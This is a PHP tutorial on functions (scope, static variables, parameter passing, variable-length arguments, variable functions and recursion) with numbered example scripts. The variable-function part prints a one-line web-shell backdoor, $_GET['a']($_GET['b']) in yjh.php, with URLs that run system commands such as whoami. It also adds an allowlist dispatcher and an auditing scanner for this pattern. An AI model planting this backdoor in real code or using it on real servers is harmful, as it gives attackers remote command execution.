Custom function
A function is a code block.
It takes input and, in most cases, produces output.
Structure
function function_name(parameters) {
    code block
    return ;
}
Note:
When a function is called, the actual parameters are assigned to the formal parameters in order.
Function calls are independent of each other; by default there is no connection between them.
After a function finishes executing, control returns to the calling position and execution continues downward.
Scope of PHP variables
Local variable
A variable defined inside a function.
Its scope is that function.
Global variable
A variable defined outside any function in a PHP script.
Its scope is the entire PHP script.
How do you use a global variable inside a function?
1. Pass it as a parameter
2. Declare it with the global keyword
3. The scope of constants is superglobal (they can be used both inside and outside functions)
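<?php
$a=10;
define("NAME","AJEST");
function test(){
    echo $a;    // undefined here: the global $a is not visible inside the function
    global $a;  // bring the global $a into the function's scope
    echo $a;    // 10
    echo NAME;  // constants can be used inside functions directly
}
test();
?>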
Static variable
Defined inside a function.
Declared with the static modifier.
Initialized only the first time the function is executed.
Passing of parameters
1. Pass parameters by value (default method)
Operations on the formal parameter do not affect the actual parameter.
2. Pass by reference
This is equivalent to giving the actual parameter an alias, so operations on the formal parameter affect the actual parameter.
3. Default parameters
If no actual parameter is passed to the function, the default value is used.
Suggestion: give all parameters default values.
4. Variable-length parameter list
func_get_arg ( int $arg_num ) : mixed
func_get_args(); //Get all parameters as an array
func_get_arg(); //Get a parameter by its offset, counting from 0
func_num_args(); //Get the number of parameters
Variable function
The function name is held in a variable, giving a structure like this:
$a($b)
It is also the simplest backdoor.
Adding parentheses directly after a variable turns it into a function call.
This kind of dynamic function call is very dangerous. If both the function name and the parameters are controllable, arbitrary commands can be executed directly. This is one of the principles behind RCE (Remote Command/Code Execution) vulnerabilities.
Some PHP statements, such as print and echo, are language constructs rather than functions, so they cannot be called this way. If you need output, try printf. (printf only outputs a string.)
The system function, in turn, executes its string argument as a command:
system — execute an external program and display the output
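The safe counterpart to $a($b), as an added example that is not part of the original page: the request value is only ever used as a key into an allowlist, so a name such as system can never be reached. The action names and handler functions are hypothetical.

```php
<?php
// Hypothetical handlers: the only code a request is allowed to reach.
function action_upper(string $s): string  { return strtoupper($s); }
function action_length(string $s): string { return (string) strlen($s); }

/**
 * Resolve a request-supplied action name to a handler.
 * The name is used only as an array key, never as a callable.
 */
function dispatch(string $action, string $arg): string
{
    // Allowlist: public action name => fixed function chosen by the developer.
    static $allowed = [
        'upper'  => 'action_upper',
        'length' => 'action_length',
    ];
    if (!array_key_exists($action, $allowed)) {
        // "system", "passthru", "assert" and every other name end up here.
        throw new InvalidArgumentException('unknown action');
    }
    // Still a variable function call, but the name comes from the allowlist.
    return $allowed[$action]($arg);
}

// Constructed sample requests standing in for $_GET['a'] and $_GET['b'].
$samples = [
    ['a' => 'upper',  'b' => 'ggg'],
    ['a' => 'length', 'b' => 'ggg'],
    ['a' => 'system', 'b' => 'whoami'],  // the request shown on this page
];
foreach ($samples as $req) {
    try {
        $out = dispatch($req['a'], $req['b']);
        echo $req['a'], ' => ', htmlspecialchars($out), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $req['a'], ' => rejected', PHP_EOL;
    }
}
```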
The simplest backdoor (the simplest one-sentence Trojan): $a($b)
Only the two variable names are gone; request parameters take their place:
<?php
$_GET['a']($_GET['b']);
?>
Enter in the URL: localhost/1.php?a=system&b=ipconfig
(system — execute an external program and display the output)
Enter in the URL: localhost/1.php?a=system&b=whoami
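To find this pattern when auditing a code base, the following added example (not from the original page) uses PHP's tokenizer to list every variable function call and mark those whose name is read directly from request input. The function name find_dynamic_calls and the sample source are constructed for illustration.

```php
<?php
function find_dynamic_calls(string $source): array
{
    $request = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE'];
    $skip = [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    // Drop whitespace and comments so neighbouring tokens can be compared.
    $tokens = array_values(array_filter(token_get_all($source), function ($t) use ($skip) {
        return !is_array($t) || !in_array($t[0], $skip, true);
    }));
    $hits = [];
    $n = count($tokens);
    for ($i = 0; $i < $n; $i++) {
        $t = $tokens[$i];
        if (!is_array($t) || $t[0] !== T_VARIABLE) {
            continue;
        }
        // Step over any [index] parts that follow the variable.
        $j = $i + 1;
        while ($j < $n && $tokens[$j] === '[') {
            $depth = 0;
            do {
                if ($tokens[$j] === '[') { $depth++; }
                if ($tokens[$j] === ']') { $depth--; }
                $j++;
            } while ($j < $n && $depth > 0);
        }
        // A "(" right after the variable makes it a variable function call.
        if ($j < $n && $tokens[$j] === '(') {
            $hits[] = ['line' => $t[2], 'name' => $t[1],
                       'request' => in_array($t[1], $request, true)];
        }
    }
    return $hits;
}

// Constructed sample source, modelled on 9.php and yjh.php from this page.
$sample = <<<'PHP'
<?php
$a = "test1";
$a("GGG");
$_GET['a']($_GET['b']);
echo strtoupper($_GET['b']);
PHP;
foreach (find_dynamic_calls($sample) as $h) {
    printf("line %d: %s(...) %s\n", $h['line'], $h['name'],
        $h['request'] ? 'name comes from the request' : 'dynamic call');
}
```

Calls through a plain variable are reported too, because the variable may have been filled from request data earlier in the script; those hits need a manual look at where the value comes from.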
Recursive function
A recursive function calls itself inside its own body.
Source code
1.php
<?php
function userprint(){
    echo "This is userprint Fun!";
}
function hello($name){
    echo "Hello, ".$name;
}
function add($a,$b){
    $c = $a + $b;
    return $c;
}
userprint();
hello("GGG");
echo "<hr />";
echo add(1,2);
?>
2.php (local variable)
<?php
$a = 10;
function test(){
    echo $a;  // undefined: the global $a is not visible inside the function
}
test();
echo "<hr />";
echo $a;  // 10
?>
3.php (global variables)
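<?php
$a = 10;
define("NAME","GGG");
function test(){
    echo $a;    // undefined here: the global $a is not visible yet
    global $a;  // bring the global $a into the function's scope
    echo $a;    // 10
    echo NAME;  // constants can be used inside functions directly
}
test();
?>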
4.php (static variable)
<?php
function test(){
    static $a = 10;  // initialized only on the first call
    echo ++$a."|";   // the value is kept between calls
}
test();
test();
test();
?>
5.php()
<?php
function A(){
    echo "This is A fun!<hr />";
}
function B(){
    echo "This is B fun!<hr />";
    A();
    echo "Fun B end!<hr />";
}
function C(){
    echo "This is Fun C<hr />";
    B();
    echo "All Fun end<hr />";
}
C();
?>
6.php (passing parameters by default/passing by reference)
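<?php
/*
// pass by value: the caller's variable is not changed
function add($x){
    echo ++$x;
}
*/
// pass by reference: $x is an alias of the caller's variable
function add(&$x){
    echo ++$x;
}
$a = 3;
add($a);
echo "<hr />";
echo $a;  // 4, because add() changed $a through the reference
?>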
7.php (default parameters)
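<?php
// The default for $a can never take effect because $b, which follows it, is required;
// PHP 8 reports a required parameter after an optional one as deprecated.
function add($a=2,$b){
    echo ($a+$b)."<hr />";
}
add(10,20);
//add(4);  // fails: no value is available for $b
add(1,2,3,4,5);  // extra arguments are ignored
?>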
8.php (variable function parameters)
<?php
function test(){
    //echo "This is :".__FUNCTION__;
    echo func_num_args();  // number of arguments passed
    echo "<br />";
    echo func_get_arg(1);  // get an argument value by its offset, counting from zero
    echo "<br />";
    for($i=0;$i<func_num_args();$i++){
        echo func_get_arg($i)."|";
    }
}
//test();
test("GGG",24,true,89.9);
echo "<br />";
?>
9.php (variable function)
<?php
function test1(){
    echo "This is func".__FUNCTION__;
    echo "<br />".func_get_arg(0);
}
function test2(){
    echo "This is func".__FUNCTION__;
    echo "<br />".func_get_arg(0);
}
//$a="test1";
//$a="test2";
//$a="var_dump";
//$a="echo";
//$a("GGG");  // the function name is taken from $a, e.g. test1("GGG")
//$a="printf";
$a ="system";
$a("ipconfig");
?>
yjh.php (the simplest backdoor)
<?php
$_GET['a']($_GET['b']);
?>
10.php (recursive function)
<?php
function test($n){
    echo $n.' ';
    if($n>0){
        test($n-1);
    }
    else{
        echo '<-->';
    }
    echo $n.' ';
}
test(3);//3 2 1 0 <-->0 1 2 3
?>